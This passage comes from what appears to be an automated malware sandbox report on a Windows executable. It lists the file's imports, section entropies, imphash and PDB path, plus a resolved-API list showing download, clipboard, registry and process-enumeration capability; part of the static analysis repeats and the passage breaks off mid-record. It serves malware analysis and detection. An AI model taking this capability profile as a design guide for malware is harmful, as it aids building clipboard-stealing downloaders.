1056. {
1057. "name": "GetProcAddress",
1058. "address": "0x42b078"
1059. },
1060. {
1061. "name": "GetLongPathNameA",
1062. "address": "0x42b07c"
1063. },
1064. {
1065. "name": "DefineDosDeviceW",
1066. "address": "0x42b080"
1067. },
1068. {
1069. "name": "HeapUnlock",
1070. "address": "0x42b084"
1071. },
1072. {
1073. "name": "MoveFileW",
1074. "address": "0x42b088"
1075. },
1076. {
1077. "name": "GetAtomNameA",
1078. "address": "0x42b08c"
1079. },
1080. {
1081. "name": "LocalAlloc",
1082. "address": "0x42b090"
1083. },
1084. {
1085. "name": "FindFirstVolumeMountPointW",
1086. "address": "0x42b094"
1087. },
1088. {
1089. "name": "OpenEventA",
1090. "address": "0x42b098"
1091. },
1092. {
1093. "name": "GetProfileStringA",
1094. "address": "0x42b09c"
1095. },
1096. {
1097. "name": "OpenJobObjectW",
1098. "address": "0x42b0a0"
1099. },
1100. {
1101. "name": "GetThreadPriority",
1102. "address": "0x42b0a4"
1103. },
1104. {
1105. "name": "FindFirstChangeNotificationA",
1106. "address": "0x42b0a8"
1107. },
1108. {
1109. "name": "WriteProfileStringW",
1110. "address": "0x42b0ac"
1111. },
1112. {
1113. "name": "MoveFileWithProgressW",
1114. "address": "0x42b0b0"
1115. },
1116. {
1117. "name": "GetConsoleProcessList",
1118. "address": "0x42b0b4"
1119. },
1120. {
1121. "name": "ExpandEnvironmentStringsW",
1122. "address": "0x42b0b8"
1123. },
1124. {
1125. "name": "CreateFileW",
1126. "address": "0x42b0bc"
1127. },
1128. {
1129. "name": "FlushFileBuffers",
1130. "address": "0x42b0c0"
1131. },
1132. {
1133. "name": "GetStringTypeW",
1134. "address": "0x42b0c4"
1135. },
1136. {
1137. "name": "WriteConsoleW",
1138. "address": "0x42b0c8"
1139. },
1140. {
1141. "name": "SetStdHandle",
1142. "address": "0x42b0cc"
1143. },
1144. {
1145. "name": "OutputDebugStringW",
1146. "address": "0x42b0d0"
1147. },
1148. {
1149. "name": "EnumSystemLocalesW",
1150. "address": "0x42b0d4"
1151. },
1152. {
1153. "name": "EncodePointer",
1154. "address": "0x42b0d8"
1155. },
1156. {
1157. "name": "DecodePointer",
1158. "address": "0x42b0dc"
1159. },
1160. {
1161. "name": "GetCommandLineA",
1162. "address": "0x42b0e0"
1163. },
1164. {
1165. "name": "RaiseException",
1166. "address": "0x42b0e4"
1167. },
1168. {
1169. "name": "RtlUnwind",
1170. "address": "0x42b0e8"
1171. },
1172. {
1173. "name": "IsDebuggerPresent",
1174. "address": "0x42b0ec"
1175. },
1176. {
1177. "name": "GetLastError",
1178. "address": "0x42b0f0"
1179. },
1180. {
1181. "name": "ExitProcess",
1182. "address": "0x42b0f4"
1183. },
1184. {
1185. "name": "GetModuleHandleExW",
1186. "address": "0x42b0f8"
1187. },
1188. {
1189. "name": "AreFileApisANSI",
1190. "address": "0x42b0fc"
1191. },
1192. {
1193. "name": "MultiByteToWideChar",
1194. "address": "0x42b100"
1195. },
1196. {
1197. "name": "WideCharToMultiByte",
1198. "address": "0x42b104"
1199. },
1200. {
1201. "name": "HeapSize",
1202. "address": "0x42b108"
1203. },
1204. {
1205. "name": "HeapFree",
1206. "address": "0x42b10c"
1207. },
1208. {
1209. "name": "HeapAlloc",
1210. "address": "0x42b110"
1211. },
1212. {
1213. "name": "SetLastError",
1214. "address": "0x42b114"
1215. },
1216. {
1217. "name": "GetCurrentThread",
1218. "address": "0x42b118"
1219. },
1220. {
1221. "name": "GetCurrentThreadId",
1222. "address": "0x42b11c"
1223. },
1224. {
1225. "name": "GetProcessHeap",
1226. "address": "0x42b120"
1227. },
1228. {
1229. "name": "GetStdHandle",
1230. "address": "0x42b124"
1231. },
1232. {
1233. "name": "GetFileType",
1234. "address": "0x42b128"
1235. },
1236. {
1237. "name": "DeleteCriticalSection",
1238. "address": "0x42b12c"
1239. },
1240. {
1241. "name": "GetStartupInfoW",
1242. "address": "0x42b130"
1243. },
1244. {
1245. "name": "GetModuleFileNameA",
1246. "address": "0x42b134"
1247. },
1248. {
1249. "name": "WriteFile",
1250. "address": "0x42b138"
1251. },
1252. {
1253. "name": "GetModuleFileNameW",
1254. "address": "0x42b13c"
1255. },
1256. {
1257. "name": "QueryPerformanceCounter",
1258. "address": "0x42b140"
1259. },
1260. {
1261. "name": "GetCurrentProcessId",
1262. "address": "0x42b144"
1263. },
1264. {
1265. "name": "GetSystemTimeAsFileTime",
1266. "address": "0x42b148"
1267. },
1268. {
1269. "name": "GetEnvironmentStringsW",
1270. "address": "0x42b14c"
1271. },
1272. {
1273. "name": "FreeEnvironmentStringsW",
1274. "address": "0x42b150"
1275. },
1276. {
1277. "name": "UnhandledExceptionFilter",
1278. "address": "0x42b154"
1279. },
1280. {
1281. "name": "SetUnhandledExceptionFilter",
1282. "address": "0x42b158"
1283. },
1284. {
1285. "name": "InitializeCriticalSectionAndSpinCount",
1286. "address": "0x42b15c"
1287. },
1288. {
1289. "name": "CreateEventW",
1290. "address": "0x42b160"
1291. },
1292. {
1293. "name": "Sleep",
1294. "address": "0x42b164"
1295. },
1296. {
1297. "name": "GetCurrentProcess",
1298. "address": "0x42b168"
1299. },
1300. {
1301. "name": "TerminateProcess",
1302. "address": "0x42b16c"
1303. },
1304. {
1305. "name": "TlsAlloc",
1306. "address": "0x42b170"
1307. },
1308. {
1309. "name": "TlsGetValue",
1310. "address": "0x42b174"
1311. },
1312. {
1313. "name": "TlsSetValue",
1314. "address": "0x42b178"
1315. },
1316. {
1317. "name": "TlsFree",
1318. "address": "0x42b17c"
1319. },
1320. {
1321. "name": "CreateSemaphoreW",
1322. "address": "0x42b180"
1323. },
1324. {
1325. "name": "EnterCriticalSection",
1326. "address": "0x42b184"
1327. },
1328. {
1329. "name": "LeaveCriticalSection",
1330. "address": "0x42b188"
1331. },
1332. {
1333. "name": "GetConsoleCP",
1334. "address": "0x42b18c"
1335. },
1336. {
1337. "name": "GetConsoleMode",
1338. "address": "0x42b190"
1339. },
1340. {
1341. "name": "SetFilePointerEx",
1342. "address": "0x42b194"
1343. },
1344. {
1345. "name": "IsValidCodePage",
1346. "address": "0x42b198"
1347. },
1348. {
1349. "name": "GetACP",
1350. "address": "0x42b19c"
1351. },
1352. {
1353. "name": "GetOEMCP",
1354. "address": "0x42b1a0"
1355. },
1356. {
1357. "name": "GetCPInfo",
1358. "address": "0x42b1a4"
1359. },
1360. {
1361. "name": "FatalAppExitA",
1362. "address": "0x42b1a8"
1363. },
1364. {
1365. "name": "SetConsoleCtrlHandler",
1366. "address": "0x42b1ac"
1367. },
1368. {
1369. "name": "FreeLibrary",
1370. "address": "0x42b1b0"
1371. },
1372. {
1373. "name": "LoadLibraryExW",
1374. "address": "0x42b1b4"
1375. },
1376. {
1377. "name": "GetDateFormatW",
1378. "address": "0x42b1b8"
1379. },
1380. {
1381. "name": "GetTimeFormatW",
1382. "address": "0x42b1bc"
1383. },
1384. {
1385. "name": "CompareStringW",
1386. "address": "0x42b1c0"
1387. },
1388. {
1389. "name": "LCMapStringW",
1390. "address": "0x42b1c4"
1391. },
1392. {
1393. "name": "GetLocaleInfoW",
1394. "address": "0x42b1c8"
1395. },
1396. {
1397. "name": "IsValidLocale",
1398. "address": "0x42b1cc"
1399. },
1400. {
1401. "name": "GetUserDefaultLCID",
1402. "address": "0x42b1d0"
1403. },
1404. {
1405. "name": "CloseHandle",
1406. "address": "0x42b1d4"
1407. }
1408. ],
1409. "dll": "KERNEL32.dll"
1410. },
1411. {
1412. "imports": [
1413. {
1414. "name": "GetMenuBarInfo",
1415. "address": "0x42b1dc"
1416. },
1417. {
1418. "name": "DrawTextExA",
1419. "address": "0x42b1e0"
1420. },
1421. {
1422. "name": "SetWindowsHookA",
1423. "address": "0x42b1e4"
1424. },
1425. {
1426. "name": "DestroyIcon",
1427. "address": "0x42b1e8"
1428. },
1429. {
1430. "name": "GetOpenClipboardWindow",
1431. "address": "0x42b1ec"
1432. },
1433. {
1434. "name": "ClientToScreen",
1435. "address": "0x42b1f0"
1436. }
1437. ],
1438. "dll": "USER32.dll"
1439. }
1440. ],
1441. "digital_signers": null,
1442. "exported_dll_name": null,
1443. "actual_checksum": "0x0005251b",
1444. "overlay": null,
1445. "imagebase": "0x00400000",
1446. "reported_checksum": "0x0005251b",
1447. "icon_hash": null,
1448. "entrypoint": "0x00407b76",
1449. "timestamp": "2018-07-23 08:18:02",
1450. "osversion": "5.1",
1451. "sections": [
1452. {
1453. "name": ".text",
1454. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
1455. "virtual_address": "0x00001000",
1456. "size_of_data": "0x00029600",
1457. "entropy": "6.72",
1458. "raw_address": "0x00000400",
1459. "virtual_size": "0x000294dd",
1460. "characteristics_raw": "0x60000020"
1461. },
1462. {
1463. "name": ".rdata",
1464. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
1465. "virtual_address": "0x0002b000",
1466. "size_of_data": "0x00013200",
1467. "entropy": "6.07",
1468. "raw_address": "0x00029a00",
1469. "virtual_size": "0x000130b2",
1470. "characteristics_raw": "0x40000040"
1471. },
1472. {
1473. "name": ".data",
1474. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1475. "virtual_address": "0x0003f000",
1476. "size_of_data": "0x00002200",
1477. "entropy": "2.74",
1478. "raw_address": "0x0003cc00",
1479. "virtual_size": "0x00014cc8",
1480. "characteristics_raw": "0xc0000040"
1481. },
1482. {
1483. "name": ".rsrc",
1484. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
1485. "virtual_address": "0x00054000",
1486. "size_of_data": "0x00006400",
1487. "entropy": "6.31",
1488. "raw_address": "0x0003ee00",
1489. "virtual_size": "0x000063b0",
1490. "characteristics_raw": "0x40000040"
1491. },
1492. {
1493. "name": ".reloc",
1494. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
1495. "virtual_address": "0x0005b000",
1496. "size_of_data": "0x00002400",
1497. "entropy": "6.55",
1498. "raw_address": "0x00045200",
1499. "virtual_size": "0x000022a0",
1500. "characteristics_raw": "0x42000040"
1501. }
1502. ],
1503. "resources": [],
1504. "dirents": [
1505. {
1506. "virtual_address": "0x00000000",
1507. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
1508. "size": "0x00000000"
1509. },
1510. {
1511. "virtual_address": "0x0003d4fc",
1512. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
1513. "size": "0x0000003c"
1514. },
1515. {
1516. "virtual_address": "0x00054000",
1517. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
1518. "size": "0x000063b0"
1519. },
1520. {
1521. "virtual_address": "0x00000000",
1522. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
1523. "size": "0x00000000"
1524. },
1525. {
1526. "virtual_address": "0x00000000",
1527. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
1528. "size": "0x00000000"
1529. },
1530. {
1531. "virtual_address": "0x0005b000",
1532. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
1533. "size": "0x000022a0"
1534. },
1535. {
1536. "virtual_address": "0x0002b250",
1537. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
1538. "size": "0x00000038"
1539. },
1540. {
1541. "virtual_address": "0x00000000",
1542. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
1543. "size": "0x00000000"
1544. },
1545. {
1546. "virtual_address": "0x00000000",
1547. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
1548. "size": "0x00000000"
1549. },
1550. {
1551. "virtual_address": "0x00000000",
1552. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
1553. "size": "0x00000000"
1554. },
1555. {
1556. "virtual_address": "0x00000000",
1557. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
1558. "size": "0x00000000"
1559. },
1560. {
1561. "virtual_address": "0x00000000",
1562. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
1563. "size": "0x00000000"
1564. },
1565. {
1566. "virtual_address": "0x0002b000",
1567. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
1568. "size": "0x000001f8"
1569. },
1570. {
1571. "virtual_address": "0x00000000",
1572. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
1573. "size": "0x00000000"
1574. },
1575. {
1576. "virtual_address": "0x00000000",
1577. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
1578. "size": "0x00000000"
1579. },
1580. {
1581. "virtual_address": "0x00000000",
1582. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
1583. "size": "0x00000000"
1584. }
1585. ],
1586. "exports": [],
1587. "guest_signers": {},
1588. "imphash": "1f9917f590ed0711a560b3a3a279ed67",
1589. "icon_fuzzy": null,
1590. "icon": null,
1591. "pdbpath": "C:\\madakonezanudano69\\widagemokiredugic-difulib-fu.pdb\\x00in\\kolanu.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\xa7",
1592. "imported_dll_count": 2,
1593. "versioninfo": []
1594. }
1595. }
1596.  
1597. [*] Resolved APIs: [
1598. "kernel32.dll.FlsAlloc",
1599. "kernel32.dll.FlsFree",
1600. "kernel32.dll.FlsGetValue",
1601. "kernel32.dll.FlsSetValue",
1602. "kernel32.dll.InitializeCriticalSectionEx",
1603. "kernel32.dll.CreateEventExW",
1604. "kernel32.dll.CreateSemaphoreExW",
1605. "kernel32.dll.SetThreadStackGuarantee",
1606. "kernel32.dll.CreateThreadpoolTimer",
1607. "kernel32.dll.SetThreadpoolTimer",
1608. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
1609. "kernel32.dll.CloseThreadpoolTimer",
1610. "kernel32.dll.CreateThreadpoolWait",
1611. "kernel32.dll.SetThreadpoolWait",
1612. "kernel32.dll.CloseThreadpoolWait",
1613. "kernel32.dll.FlushProcessWriteBuffers",
1614. "kernel32.dll.FreeLibraryWhenCallbackReturns",
1615. "kernel32.dll.GetCurrentProcessorNumber",
1616. "kernel32.dll.GetLogicalProcessorInformation",
1617. "kernel32.dll.CreateSymbolicLinkW",
1618. "kernel32.dll.EnumSystemLocalesEx",
1619. "kernel32.dll.CompareStringEx",
1620. "kernel32.dll.GetDateFormatEx",
1621. "kernel32.dll.GetLocaleInfoEx",
1622. "kernel32.dll.GetTimeFormatEx",
1623. "kernel32.dll.GetUserDefaultLocaleName",
1624. "kernel32.dll.IsValidLocaleName",
1625. "kernel32.dll.LCMapStringEx",
1626. "kernel32.dll.GetTickCount64",
1627. "kernel32.dll.VirtualProtect",
1628. "kernel32.dll.LoadLibraryA",
1629. "kernel32.dll.VirtualAlloc",
1630. "kernel32.dll.VirtualFree",
1631. "kernel32.dll.GetVersionExA",
1632. "kernel32.dll.TerminateProcess",
1633. "kernel32.dll.ExitProcess",
1634. "kernel32.dll.SetErrorMode",
1635. "msvcrt.dll._controlfp",
1636. "msvcrt.dll._except_handler3",
1637. "msvcrt.dll.__set_app_type",
1638. "msvcrt.dll.__p__fmode",
1639. "msvcrt.dll.isalpha",
1640. "msvcrt.dll.__p__commode",
1641. "msvcrt.dll._adjust_fdiv",
1642. "msvcrt.dll.__setusermatherr",
1643. "msvcrt.dll._initterm",
1644. "msvcrt.dll.__getmainargs",
1645. "msvcrt.dll._acmdln",
1646. "msvcrt.dll.exit",
1647. "msvcrt.dll._XcptFilter",
1648. "msvcrt.dll._exit",
1649. "msvcrt.dll._snprintf",
1650. "msvcrt.dll.fclose",
1651. "msvcrt.dll.fseek",
1652. "msvcrt.dll.ftell",
1653. "msvcrt.dll.wcsstr",
1654. "msvcrt.dll._wfopen",
1655. "msvcrt.dll.srand",
1656. "msvcrt.dll.rand",
1657. "msvcrt.dll._snwprintf",
1658. "msvcrt.dll.isdigit",
1659. "msvcrt.dll.memset",
1660. "msvcrt.dll.memcpy",
1661. "wininet.dll.InternetOpenUrlA",
1662. "wininet.dll.HttpQueryInfoA",
1663. "wininet.dll.InternetCloseHandle",
1664. "wininet.dll.InternetReadFile",
1665. "wininet.dll.InternetOpenUrlW",
1666. "wininet.dll.InternetOpenW",
1667. "wininet.dll.InternetOpenA",
1668. "urlmon.dll.URLDownloadToFileW",
1669. "shlwapi.dll.PathFileExistsW",
1670. "shlwapi.dll.PathFindFileNameA",
1671. "shlwapi.dll.PathFindFileNameW",
1672. "kernel32.dll.GetModuleFileNameW",
1673. "kernel32.dll.GetFileAttributesW",
1674. "kernel32.dll.CopyFileW",
1675. "kernel32.dll.CreateDirectoryW",
1676. "kernel32.dll.GetLogicalDriveStringsW",
1677. "kernel32.dll.GetDriveTypeW",
1678. "kernel32.dll.FindFirstFileW",
1679. "kernel32.dll.ExpandEnvironmentStringsW",
1680. "kernel32.dll.DeleteFileW",
1681. "kernel32.dll.CloseHandle",
1682. "kernel32.dll.FindClose",
1683. "kernel32.dll.WriteFile",
1684. "kernel32.dll.GetTickCount",
1685. "kernel32.dll.GlobalUnlock",
1686. "kernel32.dll.Sleep",
1687. "kernel32.dll.GlobalAlloc",
1688. "kernel32.dll.GlobalLock",
1689. "kernel32.dll.IsDebuggerPresent",
1690. "kernel32.dll.GetModuleHandleA",
1691. "kernel32.dll.Process32First",
1692. "kernel32.dll.Process32Next",
1693. "kernel32.dll.FindNextFileW",
1694. "kernel32.dll.SetFileAttributesW",
1695. "kernel32.dll.GetVolumeInformationW",
1696. "kernel32.dll.CreateFileW",
1697. "kernel32.dll.ExitThread",
1698. "kernel32.dll.GetStartupInfoA",
1699. "kernel32.dll.CreateThread",
1700. "kernel32.dll.CreateMutexA",
1701. "kernel32.dll.GetLastError",
1702. "kernel32.dll.CreateToolhelp32Snapshot",
1703. "kernel32.dll.CreateProcessW",
1704. "user32.dll.SetClipboardData",
1705. "user32.dll.OpenClipboard",
1706. "user32.dll.EmptyClipboard",
1707. "user32.dll.GetClipboardData",
1708. "user32.dll.CloseClipboard",
1709. "user32.dll.CharUpperA",
1710. "advapi32.dll.RegCreateKeyExA",
1711. "advapi32.dll.RegCloseKey",
1712. "advapi32.dll.RegSetValueExW",
1713. "advapi32.dll.RegOpenKeyExW",
1714. "shell32.dll.ShellExecuteW",
1715. "ole32.dll.CoInitialize",
1716. "ole32.dll.CoCreateInstance",
1717. "msvcr100.dll.atexit",
1718. "rasapi32.dll.RasConnectionNotificationW",
1719. "sechost.dll.OpenServiceA",
1720. "sechost.dll.NotifyServiceStatusChangeA",
1721. "cryptbase.dll.SystemFunction036"
1722. ]
1723.  
1724. [*] Static Analysis: {
1725. "pe": {
1726. "peid_signatures": null,
1727. "imports": [
1728. {
1729. "imports": [
1730. {
1731. "name": "FillConsoleOutputCharacterA",
1732. "address": "0x42b000"
1733. },
1734. {
1735. "name": "HeapReAlloc",
1736. "address": "0x42b004"
1737. },
1738. {
1739. "name": "GetNativeSystemInfo",
1740. "address": "0x42b008"
1741. },
1742. {
1743. "name": "SetLocaleInfoA",
1744. "address": "0x42b00c"
1745. },
1746. {
1747. "name": "WritePrivateProfileStructA",
1748. "address": "0x42b010"
1749. },
1750. {
1751. "name": "GetDefaultCommConfigW",
1752. "address": "0x42b014"
1753. },
1754. {
1755. "name": "FindResourceW",
1756. "address": "0x42b018"
1757. },
1758. {
1759. "name": "WaitNamedPipeA",
1760. "address": "0x42b01c"
1761. },
1762. {
1763. "name": "WaitForSingleObject",
1764. "address": "0x42b020"
1765. },
1766. {
1767. "name": "SetTapeParameters",
1768. "address": "0x42b024"
1769. },
1770. {
1771. "name": "GetModuleHandleW",
1772. "address": "0x42b028"
1773. },
1774. {
1775. "name": "GetTickCount",
1776. "address": "0x42b02c"
1777. },
1778. {
1779. "name": "ExpandEnvironmentStringsA",
1780. "address": "0x42b030"
1781. },
1782. {
1783. "name": "ReadConsoleW",
1784. "address": "0x42b034"
1785. },
1786. {
1787. "name": "FormatMessageA",
1788. "address": "0x42b038"
1789. },
1790. {
1791. "name": "EnumTimeFormatsA",
1792. "address": "0x42b03c"
1793. },
1794. {
1795. "name": "EnumTimeFormatsW",
1796. "address": "0x42b040"
1797. },
1798. {
1799. "name": "GlobalAlloc",
1800. "address": "0x42b044"
1801. },
1802. {
1803. "name": "GetFirmwareEnvironmentVariableA",
1804. "address": "0x42b048"
1805. },
1806. {
1807. "name": "GetStringTypeExW",
1808. "address": "0x42b04c"
1809. },
1810. {
1811. "name": "IsProcessorFeaturePresent",
1812. "address": "0x42b050"
1813. },
1814. {
1815. "name": "GetVolumePathNamesForVolumeNameW",
1816. "address": "0x42b054"
1817. },
1818. {
1819. "name": "ReplaceFileW",
1820. "address": "0x42b058"
1821. },
1822. {
1823. "name": "GetSystemDirectoryA",
1824. "address": "0x42b05c"
1825. },
1826. {
1827. "name": "CreateMailslotW",
1828. "address": "0x42b060"
1829. },
1830. {
1831. "name": "WritePrivateProfileStringW",
1832. "address": "0x42b064"
1833. },
1834. {
1835. "name": "EnumSystemLocalesA",
1836. "address": "0x42b068"
1837. },
1838. {
1839. "name": "VerifyVersionInfoW",
1840. "address": "0x42b06c"
1841. },
1842. {
1843. "name": "GetProfileIntA",
1844. "address": "0x42b070"
1845. },
1846. {
1847. "name": "Module32First",
1848. "address": "0x42b074"
1849. },
1850. {
1851. "name": "GetProcAddress",
1852. "address": "0x42b078"
1853. },
1854. {
1855. "name": "GetLongPathNameA",
1856. "address": "0x42b07c"
1857. },
1858. {
1859. "name": "DefineDosDeviceW",
1860. "address": "0x42b080"
1861. },
1862. {
1863. "name": "HeapUnlock",
1864. "address": "0x42b084"
1865. },
1866. {
1867. "name": "MoveFileW",
1868. "address": "0x42b088"
1869. },
1870. {
1871. "name": "GetAtomNameA",
1872. "address": "0x42b08c"
1873. },
1874. {
1875. "name": "LocalAlloc",
1876. "address": "0x42b090"
1877. },
1878. {
1879. "name": "FindFirstVolumeMountPointW",
1880. "address": "0x42b094"
1881. },
1882. {
1883. "name": "OpenEventA",
1884. "address": "0x42b098"
1885. },
1886. {
1887. "name": "GetProfileStringA",
1888. "address": "0x42b09c"
1889. },
1890. {
1891. "name": "OpenJobObjectW",
1892. "address": "0x42b0a0"
1893. },
1894. {
1895. "name": "GetThreadPriority",
1896. "address": "0x42b0a4"
1897. },
1898. {
1899. "name": "FindFirstChangeNotificationA",
1900. "address": "0x42b0a8"
1901. },
1902. {
1903. "name": "WriteProfileStringW",
1904. "address": "0x42b0ac"
1905. },
1906. {
1907. "name": "MoveFileWithProgressW",
1908. "address": "0x42b0b0"
1909. },
1910. {
1911. "name": "GetConsoleProcessList",
1912. "address": "0x42b0b4"
1913. },
1914. {
1915. "name": "ExpandEnvironmentStringsW",
1916. "address": "0x42b0b8"
1917. },
1918. {
1919. "name": "CreateFileW",
1920. "address": "0x42b0bc"
1921. },
1922. {
1923. "name": "FlushFileBuffers",
1924. "address": "0x42b0c0"
1925. },
1926. {
1927. "name": "GetStringTypeW",
1928. "address": "0x42b0c4"
1929. },
1930. {
1931. "name": "WriteConsoleW",
1932. "address": "0x42b0c8"
1933. },
1934. {
1935. "name": "SetStdHandle",
1936. "address": "0x42b0cc"
1937. },
1938. {
1939. "name": "OutputDebugStringW",
1940. "address": "0x42b0d0"
1941. },
1942. {
1943. "name": "EnumSystemLocalesW",
1944. "address": "0x42b0d4"
1945. },
1946. {
1947. "name": "EncodePointer",
1948. "address": "0x42b0d8"
1949. },
1950. {
1951. "name": "DecodePointer",
1952. "address": "0x42b0dc"
1953. },
1954. {
1955. "name": "GetCommandLineA",
1956. "address": "0x42b0e0"
1957. },
1958. {
1959. "name": "RaiseException",
1960. "address": "0x42b0e4"
1961. },
1962. {
1963. "name": "RtlUnwind",
1964. "address": "0x42b0e8"
1965. },
1966. {
1967. "name": "IsDebuggerPresent",
1968. "address": "0x42b0ec"
1969. },
1970. {
1971. "name": "GetLastError",
1972. "address": "0x42b0f0"
1973. },
1974. {
1975. "name": "ExitProcess",
1976. "address": "0x42b0f4"
1977. },
1978. {
1979. "name": "GetModuleHandleExW",
1980. "address": "0x42b0f8"
1981. },
1982. {
1983. "name": "AreFileApisANSI",
1984. "address": "0x42b0fc"
1985. },
1986. {
1987. "name": "MultiByteToWideChar",
1988. "address": "0x42b100"
1989. },
1990. {
1991. "name": "WideCharToMultiByte",
1992. "address": "0x42b104"
1993. },
1994. {
1995. "name": "HeapSize",
1996. "address": "0x42b108"
1997. },
1998. {
1999. "name": "HeapFree",
2000. "address": "0x42b10c"
2001. },
2002. {
2003. "name": "HeapAlloc",
2004. "address": "0x42b110"
2005. },
2006. {
2007. "name": "SetLastError",
2008. "address": "0x42b114"
2009. },
2010. {
2011. "name": "GetCurrentThread",
2012. "address": "0x42b118"
2013. },
2014. {
2015. "name": "GetCurrentThreadId",
2016. "address": "0x42b11c"
2017. },
2018. {
2019. "name": "GetProcessHeap",
2020. "address": "0x42b120"
2021. },
2022. {
2023. "name": "GetStdHandle",
2024. "address": "0x42b124"
2025. },
2026. {
2027. "name": "GetFileType",
2028. "address": "0x42b128"
2029. },
2030. {
2031. "name": "DeleteCriticalSection",
2032. "address": "0x42b12c"
2033. },
2034. {
2035. "name": "GetStartupInfoW",
2036. "address": "0x42b130"
2037. },
2038. {
2039. "name": "GetModuleFileNameA",
2040. "address": "0x42b134"
2041. },
2042. {
2043. "name": "WriteFile",
2044. "address": "0x42b138"
2045. },
2046. {
2047. "name": "GetModuleFileNameW",
2048. "address": "0x42b13c"
2049. },
2050. {
2051. "name": "QueryPerformanceCounter",
2052. "address": "0x42b140"
2053. },
2054. {
2055. "name": "GetCurrentProcessId",
2056. "address": "0x42b144"
2057. },
2058. {
2059. "name": "GetSystemTimeAsFileTime",
2060. "address": "0x42b148"
2061. },
2062. {
2063. "name": "GetEnvironmentStringsW",
2064. "address": "0x42b14c"
2065. },
2066. {
2067. "name": "FreeEnvironmentStringsW",
2068. "address": "0x42b150"
2069. },
2070. {
2071. "name": "UnhandledExceptionFilter",
2072. "address": "0x42b154"
2073. },
2074. {
2075. "name": "SetUnhandledExceptionFilter",
2076. "address": "0x42b158"
2077. },
2078. {
2079. "name": "InitializeCriticalSectionAndSpinCount",
2080. "address": "0x42b15c"
2081. },
2082. {
2083. "name": "CreateEventW",
2084. "address": "0x42b160"
2085. },
2086. {
2087. "name": "Sleep",
2088. "address": "0x42b164"
2089. },
2090. {
2091. "name": "GetCurrentProcess",
2092. "address": "0x42b168"
2093. },
2094. {
2095. "name": "TerminateProcess",
2096. "address": "0x42b16c"
2097. },
2098. {
2099. "name": "TlsAlloc",
2100. "address": "0x42b170"
2101. },
2102. {
2103. "name": "TlsGetValue",
2104. "address": "0x42b174"
2105. },
2106. {
2107. "name": "TlsSetValue",
2108. "address": "0x42b178"
2109. },
2110. {
2111. "name": "TlsFree",
2112. "address": "0x42b17c"
2113. },
2114. {
2115. "name": "CreateSemaphoreW",
2116. "address": "0x42b180"
2117. },
2118. {
2119. "name": "EnterCriticalSection",
2120. "address": "0x42b184"
2121. },
2122. {
2123. "name": "LeaveCriticalSection",
2124. "address": "0x42b188"
2125. },
2126. {
2127. "name": "GetConsoleCP",
2128. "address": "0x42b18c"
2129. },
2130. {
2131. "name": "GetConsoleMode",
2132. "address": "0x42b190"
2133. },
2134. {
2135. "name": "SetFilePointerEx",
2136. "address": "0x42b194"
2137. },
2138. {
2139. "name": "IsValidCodePage",
2140. "address": "0x42b198"
2141. },
2142. {
2143. "name": "GetACP",
2144. "address": "0x42b19c"
2145. },
2146. {
2147. "name": "GetOEMCP",
2148. "address": "0x42b1a0"
2149. },
2150. {
2151. "name": "GetCPInfo",
2152. "address": "0x42b1a4"
2153. },
2154. {
2155. "name": "FatalAppExitA",
2156. "address": "0x42b1a8"
2157. },
2158. {
2159. "name": "SetConsoleCtrlHandler",
2160. "address": "0x42b1ac"
2161. },
2162. {
2163. "name": "FreeLibrary",
2164. "address": "0x42b1b0"
2165. },
2166. {
2167. "name": "LoadLibraryExW",
2168. "address": "0x42b1b4"
2169. },
2170. {
2171. "name": "GetDateFormatW",
2172. "address": "0x42b1b8"
2173. },
2174. {
2175. "name": "GetTimeFormatW",
2176. "address": "0x42b1bc"
2177. },
2178. {
2179. "name": "CompareStringW",
2180. "address": "0x42b1c0"
2181. },
2182. {
2183. "name": "LCMapStringW",
2184. "address": "0x42b1c4"
2185. },
2186. {
2187. "name": "GetLocaleInfoW",
2188. "address": "0x42b1c8"
2189. },
2190. {
2191. "name": "IsValidLocale",
2192. "address": "0x42b1cc"
2193. },
2194. {
2195. "name": "GetUserDefaultLCID",
2196. "address": "0x42b1d0"
2197. },
2198. {
2199. "name": "CloseHandle",
2200. "address": "0x42b1d4"
2201. }
2202. ],
2203. "dll": "KERNEL32.dll"
2204. },
2205. {
2206. "imports": [
2207. {
2208. "name": "GetMenuBarInfo",
2209. "address": "0x42b1dc"
2210. },
2211. {
2212. "name": "DrawTextExA",
2213. "address": "0x42b1e0"
2214. },
2215. {
2216. "name": "SetWindowsHookA",
2217. "address": "0x42b1e4"
2218. },
2219. {
2220. "name": "DestroyIcon",
2221. "address": "0x42b1e8"
2222. },
2223. {
2224. "name": "GetOpenClipboardWindow",
2225. "address": "0x42b1ec"
2226. },
2227. {
2228. "name": "ClientToScreen",
2229. "address": "0x42b1f0"
2230. }
2231. ],
2232. "dll": "USER32.dll"
2233. }
2234. ],
2235. "digital_signers": null,
2236. "exported_dll_name": null,
2237. "actual_checksum": "0x0005251b",
2238. "overlay": null,
2239. "imagebase": "0x00400000",
